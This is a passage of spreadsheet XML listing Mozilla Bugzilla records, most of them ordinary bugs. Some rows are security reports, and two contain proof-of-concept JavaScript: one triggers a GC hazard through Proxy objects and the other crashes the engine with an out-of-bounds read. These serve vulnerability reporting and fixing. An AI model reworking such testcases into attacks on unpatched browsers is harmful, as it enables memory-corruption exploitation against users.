        </is>
      </c>
      <c r="C764" t="inlineStr">
        <is>
          <t>gif images (with transparency) display corrupted</t>
        </is>
      </c>
      <c r="D764" t="inlineStr">
        <is>
          <t>2007-12-24 16:29:12 -0800</t>
        </is>
      </c>
      <c r="E764" t="n">
        <v>1</v>
      </c>
      <c r="F764" t="n">
        <v>1</v>
      </c>
      <c r="G764" t="n">
        <v>3</v>
      </c>
      <c r="H764" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I764" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J764" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K764" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L764" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M764" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N764" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P764" t="inlineStr"/>
      <c r="Q764" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R764" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S764" t="inlineStr">
        <is>
          <t>mozilla1.9beta3</t>
        </is>
      </c>
      <c r="T764" t="n">
        <v>1</v>
      </c>
      <c r="U764" t="n">
        <v>1</v>
      </c>
      <c r="V764" t="n">
        <v>23</v>
      </c>
      <c r="W764" t="inlineStr">
        <is>
          <t>Created attachment 294200
Screen shot from bonsai page
Gif images display with bad colour shifts
based on hourly builds:
20071221_0155 build: OK
20071221_0240 build: Bad
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=1198230900&amp;maxdate=1198233599
bug 406580</t>
        </is>
      </c>
      <c r="X764" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="765">
      <c r="A765" t="n">
        <v>524826</v>
      </c>
      <c r="B765" t="inlineStr">
        <is>
          <t>2009-10-27 16:45:41 -0700</t>
        </is>
      </c>
      <c r="C765" t="inlineStr">
        <is>
          <t>Sometimes typing into the phonebook search box and many keyboard shortcuts fail or "Assertion failure: PCVAL_TO_OBJECT(entry-&gt;vword) == JSVAL_TO_OBJECT(v), at ../jsinterp.cpp"</t>
        </is>
      </c>
      <c r="D765" t="inlineStr">
        <is>
          <t>2010-02-18 14:31:51 -0800</t>
        </is>
      </c>
      <c r="E765" t="n">
        <v>1</v>
      </c>
      <c r="F765" t="n">
        <v>1</v>
      </c>
      <c r="G765" t="n">
        <v>3</v>
      </c>
      <c r="H765" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I765" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J765" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K765" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N765" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P765" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q765" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R765" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S765" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T765" t="n">
        <v>1</v>
      </c>
      <c r="U765" t="n">
        <v>0</v>
      </c>
      <c r="V765" t="n">
        <v>47</v>
      </c>
      <c r="W765" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #518103 +++
On OSX I cannot seem to type into the phonebook's search box. Also pressing various shortcuts for example to open the error console no longer work. This is testing with a current nightly
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.3a1pre) Gecko/20091027 Firefox/3.5 ID:20091027031433</t>
        </is>
      </c>
      <c r="X765" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="766">
      <c r="A766" t="n">
        <v>568303</v>
      </c>
      <c r="B766" t="inlineStr">
        <is>
          <t>2010-05-26 12:19:01 -0700</t>
        </is>
      </c>
      <c r="C766" t="inlineStr">
        <is>
          <t>GC hazards in JS_SetWatchPoint with proxies</t>
        </is>
      </c>
      <c r="D766" t="inlineStr">
        <is>
          <t>2010-10-30 18:14:22 -0700</t>
        </is>
      </c>
      <c r="E766" t="n">
        <v>1</v>
      </c>
      <c r="F766" t="n">
        <v>1</v>
      </c>
      <c r="G766" t="n">
        <v>3</v>
      </c>
      <c r="H766" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I766" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J766" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K766" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N766" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P766" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey [critsmash:patch]</t>
        </is>
      </c>
      <c r="Q766" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R766" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S766" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T766" t="n">
        <v>1</v>
      </c>
      <c r="U766" t="n">
        <v>0</v>
      </c>
      <c r="V766" t="n">
        <v>12</v>
      </c>
      <c r="W766" t="inlineStr">
        <is>
          <t>JS_SetWatchPoint contains the following fragment:
    if (!js_LookupProperty(cx, obj, propid, &amp;pobj, &amp;prop))
        return JS_FALSE;
...
    } else if (pobj != obj) {
...
        if (pobj-&gt;isNative()) {
        } else {
            if (!pobj-&gt;getProperty(cx, propid, &amp;value) ||
                !pobj-&gt;getAttributes(cx, propid, prop, &amp;attrs))
...
        }
        pobj-&gt;dropProperty(cx, prop);
        /* Recall that obj is native, whether or not pobj is native. */
        if (!js_DefineNativeProperty(cx, obj, propid, value, getter, setter,
                                     attrs, flags, shortid, &amp;prop)) {
            return JS_FALSE;
        }
There are 2 bugs here. First dropProperty is called after getProperty call that can run arbitrary scripts (either via Proxies or liveconnect on older branches). This could be problematic if obj becames thread-shared but in general this is not exploitable in the default firefox configuration.
Second the value passed to the getProperty call is not rooted. With proxies this becomes a GC hazard since the proxy can overwrite both getProperty to return newborn object and getAttributes to force the GC to collect it before it is stored using js_DefineNativeProperty. Note that this is not exploitable with liveconnect since the implementation of getAttributes in the Java bridge is trivial and cannot trigger the GC.
Here is an example demonstrating the second bug:
function force_gc() {
    buffer = null;
    gc();
    buffer = [];
    for (var i = 0; i != 1e5; ++i)
        buffer.push("123456".substring(1));
}
var buffer = [];
for (var i = 0; i != 4000; ++i)
    buffer.push({});
// Point obj to a proxy where the get method creates anew object and
// getOwnPropertyDescriptor collects it when called from 
var obj = { __proto__ : Proxy.create({
          has: function(name) { return name == "x"; },
          get: function(name) { print(111);return {}; },
          getOwnPropertyDescriptor: function (name) { force_gc(); return {}; },
        })};
Object.prototype.watch.call(obj, 'x', function() {});
uneval(obj.x);
Regarding branch nomination: currently I do not see how the bug could affect the older branches, but it is better to play safe and make sure that the problem is fixed everywhere rather than hoping that the analysis is correct.</t>
        </is>
      </c>
      <c r="X766" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="767">
      <c r="A767" t="n">
        <v>1186973</v>
      </c>
      <c r="B767" t="inlineStr">
        <is>
          <t>2015-07-23 10:18:26 -0700</t>
        </is>
      </c>
      <c r="C767" t="inlineStr">
        <is>
          <t>Crash [@ strlen] with evaluate and bytecache</t>
        </is>
      </c>
      <c r="D767" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:32 -0700</t>
        </is>
      </c>
      <c r="E767" t="n">
        <v>1</v>
      </c>
      <c r="F767" t="n">
        <v>1</v>
      </c>
      <c r="G767" t="n">
        <v>3</v>
      </c>
      <c r="H767" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I767" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J767" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K767" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L767" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M767" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N767" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P767" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q767" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S767" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T767" t="n">
        <v>1</v>
      </c>
      <c r="U767" t="n">
        <v>0</v>
      </c>
      <c r="V767" t="n">
        <v>13</v>
      </c>
      <c r="W767" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 2ddec2dedced (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
test = (function () {
  function f(x) {
    function ifTrue() {};
    function ifFalse() {};
    if (x) return ifTrue();
    else return ifFalse();
  }
  return f.toSource() + "; f((generation % 2) == 0)";
})();
evalWithCache(test, { assertEqBytecode: true, assertEqResult : true });
function evalWithCache(code, ctx) {
  code = code instanceof Object ? code : cacheEntry(code);
  ctx.global = newGlobal();
  ctx.global.generation = 0;
  var res1 = evaluate(code, Object.create(ctx, {saveBytecode: { value: true } }));
  ctx.global.generation = 1;
  var res2 = evaluate(code, Object.create(ctx, {loadBytecode: { value: true }, saveBytecode: { value: true } }));
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
#0  strlen () at ../sysdeps/x86_64/strlen.S:106
#1  0x0000000000acffcc in js::ExpandErrorArgumentsVA (cx=0x7ffff69811c0, callback=&lt;optimized out&gt;, userRef=&lt;optimized out&gt;, errorNumber=16, messagep=0x7fffffffc760, reportp=0x7fffffffc770, argumentsType=js::ArgumentsAreASCII, ap=0x7fffffffc838) at js/src/jscntxt.cpp:609
#2  0x0000000000ad05c8 in js::ReportErrorNumberVA (cx=0x7ffff69811c0, flags=0, callback=0x47add0 &lt;js::shell::my_GetErrorMessage(void*, unsigned int)&gt;, userRef=0x0, errorNumber=16, argumentsType=js::ArgumentsAreASCII, ap=0x7fffffffc838) at js/src/jscntxt.cpp:746
#3  0x0000000000ad068b in JS_ReportErrorNumberVA (cx=&lt;optimized out&gt;, errorCallback=&lt;optimized out&gt;, userRef=&lt;optimized out&gt;, errorNumber=&lt;optimized out&gt;, ap=ap@entry=0x7fffffffc838) at js/src/jsapi.cpp:5350
#4  0x0000000000ad0716 in JS_ReportErrorNumber (cx=cx@entry=0x7ffff69811c0, errorCallback=errorCallback@entry=0x47add0 &lt;js::shell::my_GetErrorMessage(void*, unsigned int)&gt;, userRef=userRef@entry=0x0, errorNumber=errorNumber@entry=16) at js/src/jsapi.cpp:5339
#5  0x000000000048a0de in Evaluate (cx=0x7ffff69811c0, argc=&lt;optimized out&gt;, vp=0x7ffff47f4148) at js/src/shell/js.cpp:1260
#6  0x00000000006cb9f2 in js::CallJSNative (cx=0x7ffff69811c0, native=0x489050 &lt;Evaluate(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
#7  0x00000000006baef2 in js::Invoke (cx=cx@entry=0x7ffff69811c0, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:720
#8  0x00000000006ad032 in Interpret (cx=cx@entry=0x7ffff69811c0, state=...) at js/src/vm/Interpreter.cpp:2972
#9  0x00000000006ba8f3 in js::RunScript (cx=cx@entry=0x7ffff69811c0, state=...) at js/src/vm/Interpreter.cpp:661
#10 0x00000000006c5606 in js::ExecuteKernel (cx=cx@entry=0x7ffff69811c0, script=..., script@entry=..., scopeChainArg=..., thisv=..., newTargetValue=..., type=type@entry=js::EXECUTE_GLOBAL, evalInFrame=evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:902
#11 0x00000000006c78f3 in js::Execute (cx=cx@entry=0x7ffff69811c0, script=script@entry=..., scopeChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:936
#12 0x0000000000ac4496 in ExecuteScript (cx=cx@entry=0x7ffff69811c0, scope=..., script=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4334
#13 0x0000000000ac460b in JS_ExecuteScript (cx=cx@entry=0x7ffff69811c0, scriptArg=..., scriptArg@entry=...) at js/src/jsapi.cpp:4365
#14 0x00000000004284d1 in RunFile (compileOnly=false, file=0x7ffff699e800, filename=0x7fffffffe0da "min.js", cx=0x7ffff69811c0) at js/src/shell/js.cpp:458
#15 Process (cx=cx@entry=0x7ffff69811c0, filename=0x7fffffffe0da "min.js", forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:576
#16 0x0000000000477453 in ProcessArgs (op=0x7fffffffdb90, cx=0x7ffff69811c0) at js/src/shell/js.cpp:5771
#17 Shell (envp=&lt;optimized out&gt;, op=0x7fffffffdb90, cx=0x7ffff69811c0) at js/src/shell/js.cpp:6040
#18 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6384
rax	0x384	900
rbx	0x7fffffffc770	140737488340848
rcx	0x384	900
rdx	0x7fffffffc870	140737488341104
rsi	0x384	900
rdi	0x384	900
rbp	0x7fffffffc730	140737488340784
rsp	0x7fffffffc5c8	140737488340424
r8	0x0	0
r9	0xe00	3584
r10	0x4	4
r11	0x3	3
r12	0x7fffffffc838	140737488341048
r13	0x0	0
r14	0x0	0
r15	0x7ffff47c3e40	140737295171136
rip	0x7ffff6c4256a &lt;strlen+42&gt;
=&gt; 0x7ffff6c4256a &lt;strlen+42&gt;:	movdqu (%rax),%xmm12
   0x7ffff6c4256f &lt;strlen+47&gt;:	pcmpeqb %xmm8,%xmm12
Marking s-s because the crash is an unsafe out-of-bounds. Not sure if this can be triggered in the browser since the test uses evaluate with the bytecode cache.</t>
        </is>
      </c>
      <c r="X767" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="768">
      <c r="A768" t="n">
        <v>1401660</v>
      </c>
      <c r="B768" t="inlineStr">
        <is>
          <t>2017-09-20 11:29:19 -0700</t>
        </is>
      </c>
      <c r="C768" t="inlineStr">
        <is>
          <t>Broken AppStore and login Snackbars</t>
        </is>
      </c>
      <c r="D768" t="inlineStr">
        <is>
          <t>2017-09-27 08:45:20 -0700</t>
        </is>
      </c>
      <c r="E768" t="n">
        <v>1</v>
      </c>
      <c r="F768" t="n">
        <v>1</v>
      </c>
      <c r="G768" t="n">
        <v>2</v>
      </c>
      <c r="H768" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I768" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J768" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K768" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L768" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M768" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N768" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P768" t="inlineStr">
        <is>
          <t>[Photon][MobileCore]</t>
        </is>
      </c>
      <c r="Q768" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R768" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S768" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T768" t="n">
        <v>1</v>
      </c>
      <c r="U768" t="n">
        <v>0</v>
      </c>
      <c r="V768" t="n">
        <v>3</v>
      </c>
      <c r="W768" t="inlineStr">
        <is>
          <t>Created attachment 8910408
Simulator Screen Shot - iPhone 7 - 2017-09-20 at 11.09.22.png
Noticed a UI bug in the Fennec app. Opened www.gmail.com, logged-in to gmail account, its giving a option to save login at bottom, which is overlapping the bottom bar and overlapping the webview content.</t>
        </is>
      </c>
      <c r="X768" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="769">
      <c r="A769" t="n">
        <v>1130408</v>
      </c>
      <c r="B769" t="inlineStr">
        <is>
          <t>2015-02-06 07:44:01 -0800</t>
        </is>
      </c>
      <c r="C769" t="inlineStr">
        <is>
          <t>Move the deploy script restart-jobs calls outside of the hostgroups loops</t>
        </is>
      </c>
      <c r="D769" t="inlineStr">
        <is>
          <t>2015-03-09 06:10:32 -0700</t>
        </is>
      </c>
      <c r="E769" t="n">
        <v>1</v>
      </c>
      <c r="F769" t="n">
        <v>1</v>
      </c>
      <c r="G769" t="n">
        <v>7</v>
      </c>
      <c r="H769" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I769" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J769" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K769" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L769" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M769" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P769" t="inlineStr"/>
      <c r="Q769" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R769" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S769" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T769" t="n">
        <v>1</v>
      </c>
      <c r="U769" t="n">
        <v>0</v>
      </c>
      <c r="V769" t="n">
        <v>6</v>
      </c>
      <c r="W769" t="inlineStr">
        <is>
          <t>Broken out from bug 1079270 comment 32.</t>
        </is>
      </c>
      <c r="X769" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="770">
      <c r="A770" t="n">
        <v>716067</v>
      </c>
      <c r="B770" t="inlineStr">
        <is>
          <t>2012-01-06 13:58:01 -0800</t>
        </is>
      </c>
      <c r="C770" t="inlineStr">
        <is>
          <t>Possibly missing UnmarkGray in a few places</t>
        </is>
      </c>
      <c r="D770" t="inlineStr">
        <is>
          <t>2012-07-12 08:54:40 -0700</t>
        </is>
      </c>
      <c r="E770" t="n">
        <v>1</v>
      </c>
      <c r="F770" t="n">
        <v>1</v>
      </c>
      <c r="G770" t="n">
        <v>3</v>
      </c>
      <c r="H770" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I770" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J770" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K770" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L770" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M770" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N770" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P770" t="inlineStr">
        <is>
          <t>[sg:low][qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q770" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R770" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S770" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T770" t="n">
        <v>1</v>
      </c>
      <c r="U770" t="n">
        <v>0</v>
      </c>
      <c r="V770" t="n">
        <v>14</v>
      </c>
      <c r="W770" t="inlineStr">
        <is>
          <t>I'm not sure if these are correct, but it seems like we could be missing UnmarkGray calls in a few places.</t>
        </is>
      </c>
      <c r="X770" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="771">
      <c r="A771" t="n">
        <v>621090</v>
      </c>
      <c r="B771" t="inlineStr">
        <is>
          <t>2010-12-22 19:46:41 -0800</t>
        </is>
      </c>
      <c r="C771" t="inlineStr">
        <is>
          <t>[SECURITY] Adding saved searches lacks CSRF protection</t>
        </is>
      </c>
      <c r="D771" t="inlineStr">
        <is>
          <t>2013-01-28 10:07:04 -0800</t>
        </is>
      </c>
      <c r="E771" t="n">
        <v>1</v>
      </c>
      <c r="F771" t="n">
        <v>1</v>
      </c>
      <c r="G771" t="n">
        <v>4</v>
      </c>
      <c r="H771" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I771" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J771" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K771" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N771" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P771" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:moderate]</t>
        </is>
      </c>
      <c r="Q771" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R771" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S771" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T771" t="n">
        <v>1</v>
      </c>
      <c r="U771" t="n">
        <v>0</v>
      </c>
      <c r="V771" t="n">
        <v>38</v>
      </c>
      <c r="W771" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Build Identifier: 
Hi Mozilla people,
I found a new CSRF, this time on bugzilla.mozilla.org
It's easy, the remembered search is not protected and this could
be used to post "shit" on panels of legitimate users.
I've made a simple PoC/Exploit to trigger the vulnerability (it's attached)
Solution: Protect this request with a token as others
Regards,
Jose.
Reproducible: Always
Steps to Reproduce:
See details
Actual Results:  
See details
Expected Results:  
See details
See details</t>
        </is>
      </c>
      <c r="X771" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="772">
      <c r="A772" t="n">
        <v>1246061</v>
      </c>
      <c r="B772" t="inlineStr">
        <is>
          <t>2016-02-04 19:28:57 -0800</t>
        </is>
      </c>
      <c r="C772" t="inlineStr">
        <is>
          <t>null-byte written out of bounds using .watch() due to generation count overflow</t>
        </is>
      </c>
      <c r="D772" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:08 -0700</t>
        </is>
      </c>
      <c r="E772" t="n">
        <v>1</v>
      </c>
      <c r="F772" t="n">
        <v>1</v>
      </c>
      <c r="G772" t="n">
        <v>3</v>
      </c>
      <c r="H772" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I772" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J772" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K772" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L772" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M772" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N772" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P772" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+][adv-esr38.8+] CESG REF: 54224850 / VULNERABILITY ID: 426732</t>
        </is>
      </c>
      <c r="Q772" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R772" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S772" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T772" t="n">
        <v>1</v>
      </c>
      <c r="U772" t="n">
        <v>0</v>
      </c>
      <c r="V772" t="n">
        <v>56</v>
      </c>
      <c r="W772" t="inlineStr">
        <is>
          <t>Created attachment 8716150
CESG Vulnerability Report 2 (pdf)
The CESG (https://www.cesg.gov.uk/) sent a vulnerability report to the security alias concerning a bug in the JS engine regarding Object.watch()
CESG REF: 54224850 / VULNERABILITY ID: 426732
Details in the attached PDF
   "There is a way to trick SpiderMonkey into using an invalid hash entry
   by overflowing an unsigned 32-bit integer. This makes it possible to use
   this vulnerability to write a null byte at a relative offset using an
   invalid pointer. This is achieved using Watchers. [...]"
Their PoC runs in a worker and increments the generation count until it wraps around to the same value.</t>
        </is>
      </c>
      <c r="X772" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="773">
      <c r="A773" t="n">
        <v>392931</v>
      </c>
      <c r="B773" t="inlineStr">
        <is>
          <t>2007-08-20 13:09:08 -0700</t>
        </is>
      </c>
      <c r="C773" t="inlineStr">
        <is>
          <t>Move Thunderbird Windows Build to the New Reference Platform</t>
        </is>
      </c>
      <c r="D773" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E773" t="n">
        <v>1</v>
      </c>
      <c r="F773" t="n">
        <v>1</v>
      </c>
      <c r="G773" t="n">
        <v>5</v>
      </c>
      <c r="H773" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I773" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J773" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K773" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L773" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M773" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N773" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P773" t="inlineStr"/>
      <c r="Q773" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R773" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S773" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T773" t="n">
        <v>1</v>
      </c>
      <c r="U773" t="n">
        <v>0</v>
      </c>
      <c r="V773" t="n">
        <v>7</v>
      </c>
      <c r="W773" t="inlineStr">
        <is>
          <t>Not sure if we want a separate bug for Thunderbird, but we'll need to update the thunderbird windows build machine to the new reference platform. Rob Strong mentioned that he has some code changes coming down the pipeline that are going to require that the windows build be updated.</t>
        </is>
      </c>
      <c r="X773" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="774">
      <c r="A774" t="n">
        <v>2397</v>
      </c>
      <c r="B774" t="inlineStr">
        <is>
          <t>1999-01-14 16:27:22 -0800</t>
        </is>
      </c>
      <c r="C774" t="inlineStr">
        <is>
          <t>[PP] http://www.sony.com/: background does not render</t>
        </is>
      </c>
      <c r="D774" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:29 -0700</t>
        </is>
      </c>
      <c r="E774" t="n">
        <v>1</v>
      </c>
      <c r="F774" t="n">
        <v>1</v>
      </c>
      <c r="G774" t="n">
        <v>3</v>
      </c>
      <c r="H774" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I774" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J774" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K774" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L774" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M774" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N774" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
